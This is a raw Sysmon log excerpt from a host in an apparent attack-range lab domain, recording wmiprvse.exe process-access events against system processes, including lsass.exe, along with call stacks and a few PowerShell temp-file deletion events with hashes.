16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D98-603E-98AA-00000000AD01}1066413684C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D98-603E-95AA-00000000AD01}6528ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dixllbbh.ma5.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D97-603E-91AA-00000000AD01}16200ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 